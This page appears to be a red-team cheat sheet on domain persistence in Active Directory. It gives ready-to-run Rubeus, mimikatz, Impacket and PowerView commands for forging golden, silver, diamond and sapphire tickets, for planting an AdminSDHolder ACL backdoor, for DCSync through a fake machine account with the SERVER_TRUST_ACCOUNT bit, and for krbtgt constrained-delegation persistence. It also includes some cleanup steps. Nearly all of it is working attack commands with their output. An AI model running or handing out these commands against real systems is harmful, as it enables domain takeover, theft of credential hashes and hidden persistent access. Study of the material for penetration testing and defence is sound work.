Dominance

Last updated 9 days ago

Dominance

Silver Ticket

Cmd > Rubeus.exe s4u /domain:megacorp.local /dc:dc1.megacorp.local /user:SRV01$ /rc4:fc525c9683e8fe067095ba2ddc971889 /altservice:http/srv01.megacorp.local /impersonateuser:Administrator /self /ptt

$ getST.py megacorp.local/'SRV01$' -hashes :fc525c9683e8fe067095ba2ddc971889 -dc-ip 192.168.1.11 -spn ldap/srv01.megacorp.local -impersonate 'Administrator'

Golden Ticket

Cmd > .\mimikatz.exe "kerberos::golden /domain:megacorp.local /user:snovvcrash /sid:<SID> /krbtgt:<NTHASH> /ptt [/startoffset:-10 /endin:60 /renewmax:10080]" "exit"
Cmd > .\mimikatz.exe "lsadump::dcsync /user:megacorp.local\krbtgt /domain:megacorp.local" "exit"

$ ticketer.py -domain megacorp.local -domain-sid S-1-5-21-4266912945-3985045794-2943778634 {-nthash <RC4_32> | -aesKey <AES_64> } [-groups '512,513,516,518,519,520'] [-user-id 1337] [-duration 87600] snovvcrash
$ export KRB5CCNAME=`readlink -f snovvcrash.ccache`
$ psexec.py megacorp.local/snovvcrash@DC01.megacorp.local -k -no-pass
$ secretsdump.py megacorp.local/snovvcrash@DC01.megacorp.local -dc-ip 10.10.13.37 -just-dc-user 'MEGACORP\krbtgt' -k -no-pass

Diamond Ticket

$ ticketer.py -request -user lowpriv -password 'Passw0rd!' -domain megacorp.local -domain-sid S-1-5-21-4266912945-3985045794-2943778634 -aesKey <AES_KEY> [-groups '512,513,516,518,519,520'] [-user-id 1337] [-duration 87600] snovvcrash

Sapphire Ticket

$ ticketer.py -request -user lowpriv -password 'Passw0rd!' -impersonate administrator -domain megacorp.local -domain-sid S-1-5-21-4266912945-3985045794-2943778634 -nthash <NT_HASH> -aesKey <AES_KEY> administrator

AdminSDHolder Modification

Create a Backdoor

Add a new domain user or grant an existent user GenericAll permissions for the AdminSDHolder container:

PV3 > Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=megacorp,DC=local" -TargetDomain megacorp.local -PrincipalIdentity snovvcrash -PrincipalDomain megacorp.local -Rights All -Verbose

Check that granting AdminSDHolder permissions was successful (may take 60+ minutes for the security ACLs to get updated for that user):

PV3 > Get-DomainUser snovvcrash | select objectsid
S-1-5-21-2284550090-1208917427-1204316795-9824

PV3 > Get-DomainObjectAcl -Identity "CN=AdminSDHolder,CN=System,DC=megacorp,DC=local" -Domain megacorp.local -ResolveGUIDs | ? {$_.SecurityIdentifier -eq "S-1-5-21-2284550090-1208917427-1204316795-9824"}

AceType               : AccessAllowed
ObjectDN              : CN=AdminSDHolder,CN=System,DC=megacorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength          : 0
ObjectSID             :
InheritanceFlags      : None
BinaryLength          : 36
IsInherited           : False
IsCallback            : False
PropagationFlags      : None
SecurityIdentifier    : S-1-5-21-2284550090-1208917427-1204316795-9824
AccessMask            : 983551
AuditFlags            : None
AceFlags              : None
AceQualifier          : AccessAllowed

Now you can add yourself (the "snovvcrash" user) to the Domain Admins group any time and do stuff (actually adding the user to Domain Admins every time is not necessary, as the AdminCount attribute will stay 1 anyways after adding the backdoor user to a protected group for the first time):

PV3 > Add-DomainGroupMember -Identity "Domain Admins" -Members snovvcrash
PV3 > Get-DomainObjectAcl -Identity "Domain Admins" -Domain megacorp.local -ResolveGUIDs | ? {$_.SecurityIdentifier -eq "S-1-5-21-2284550090-1208917427-1204316795-9824"}

AceType               : AccessAllowed
ObjectDN              : CN=Domain Admins,CN=Users,DC=megacorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength          : 0
ObjectSID             : S-1-5-21-2284550090-1208917427-1204316795-512
InheritanceFlags      : None
BinaryLength          : 36
IsInherited           : False
IsCallback            : False
PropagationFlags      : None
SecurityIdentifier    : S-1-5-21-2284550090-1208917427-1204316795-9824
AccessMask            : 983551
AuditFlags            : None
AceFlags              : None
AceQualifier          : AccessAllowed

PV3 > Remove-DomainGroupMember -Identity "Domain Admins" -Members snovvcrash
PV3 > Get-DomainUser snovvcrash | select admincount

admincount
----------
         1

Remove the Backdoor

Disable or remove the account (if a new user was created):

PS > net user snovvcrash /domain /active:no
PS > net user snovvcrash /domain /del

Remove user AdminSDHolder container via GUI (ADUC, dsa.msc).

Clear the AdminCount attribute (will be resetted if the user is still in the AdminSDHolder container):

PV3 > Set-DomainObject -Identity snovvcrash -Domain megacorp.local -Clear admincount -Verbose
Or
PS > Get-ADUser snovvcrash | Set-ADObject -Clear admincount

Fix the inheritance rules:

PS > [bool]$isProtected = $false
PS > [bool]$PreserveInheritance = $true
PS > [string]$dn = (Get-ADUser snovvcrash).DistinguishedName
PS > $user = [ADSI]"LDAP://$dn"
PS > $acl = $user.objectSecurity
PS > $acl.AreAccessRulesProtected
True  # procced if True
PS > $acl.SetAccessRuleProtection($isProtected, $PreserveInheritance)
PS > $inherited = $acl.AreAccessRulesProtected
PS > $user.commitchanges()
PS > $acl.AreAccessRulesProtected
False

SERVER_TRUST_ACCOUNT

When DA is owned (or any other account with DS-Install-Replica permission), you can create a fake machine account (or use an existing real machine account), set SERVER_TRUST_ACCOUNT bit for it and perform DCSync on behalf of this account to regain domain dominance.

1. Create a fake machine account:

PM > New-MachineAccount -MachineAccount FakeMachine -Password $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force) -Verbose
PV3 > Get-DomainComputer FakeMachine | select name,primarygroupid,useraccountcontrol

name        primarygroupid        useraccountcontrol
----        --------------        ------------------
FakeMachine            515 WORKSTATION_TRUST_ACCOUNT

2. Set the SERVER_TRUST_ACCOUNT bit:

PV3 > Set-DomainObject FakeMachine -Set @{useraccountcontrol=8192}
PV3 > Get-DomainComputer FakeMachine | select name,primarygroupid,useraccountcontrol

name        primarygroupid   useraccountcontrol
----        --------------   ------------------
FakeMachine            516 SERVER_TRUST_ACCOUNT

3. Perform DCSync:

$ secretsdump.py MEGACORP/'FakeMachine$:Passw0rd!'@DC01.megacorp.local -dc-ip 192.168.1.11 -just-dc-user 'MEGACORP\krbtgt'

4. Clean up:

PV3 > Set-DomainObject FakeMachine -Set @{useraccountcontrol=4096}
Or
PM > Remove-MachineAccount -MachineAccount FakeMachine

KRBTGT Constrained Delegation

# create a new service account (or abuse an existing one)
PM > New-MachineAccount -Domain megacorp.local -DomainController DC01.megacorp.local -MachineAccount FakeMachine -Password $(ConvertTo-SecureString 'Passw0rd1!' -AsPlainText -Force) -Verbose
# set UAC to be 'WORKSTATION_TRUST_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION'
PV3 > Set-DomainObject "CN=FakeMachine,CN=Computers,DC=megacorp,DC=local" -Set @{useraccountcontrol=16781312} -Verbose
# set the krbtgt SPN for delegation
PV3 > Set-DomainObject "CN=FakeMachine,CN=Computers,DC=megacorp,DC=local" -Set @{"msDS-AllowedToDelegateTo"=@("krbtgt/MEGACORP")} -Verbose
# request TGS via S4U (will act as a TGT of the impersonated user)
PS > .\Rubeus.exe s4u /domain:megacorp.net /user:FakeMachine$ /rc4:b2bdbe60565b677dfb133866722317fd /impersonateuser:snovvcrash /msdsspn:krbtgt/MEGACORP /ptt
# cleanup: remove the SPN for delegation
PV3 > Set-DomainObject "CN=FakeMachine,CN=Computers,DC=megacorp,DC=local" -Clear msDS-AllowedToDelegateTo -Verbose
# cleanup: back to UAC 'WORKSTATION_TRUST_ACCOUNT'
PV3 > Set-DomainObject "CN=FakeMachine,CN=Computers,DC=megacorp,DC=local" -Set @{useraccountcontrol=4096} -Verbose

# create a new service account (or abuse an existing one)
$ addcomputer.py -computer-name Persist1 -computer-pass 'Passw0rd1!' -dc-ip 192.168.1.11 megacorp.local/lowpriv:'Passw0rd2!'
# set UAC to be 'WORKSTATION_TRUST_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION' and set the krbtgt SPN for delegation
$ python3 setCD.py megacorp.local/administrator:'Passw0rd3!' -dc-ip 192.168.1.11 -target 'Persist1$' -spn krbtgt/MEGACORP
# request TGS via S4U (will act as a TGT of the impersonated user)
$ getST.py -spn krbtgt/MEGACORP megacorp.local/'Persist1$:Passw0rd1!' -dc-ip 192.168.1.11 -impersonate 'DC01$'
# fire DCSync
$ KRB5CCNAME=`pwd`/'DC01$.ccache' secretsdump.py DC01.megacorp.local -dc-ip 192.168.1.11 -k -no-pass -just-dc

Last updated 9 days ago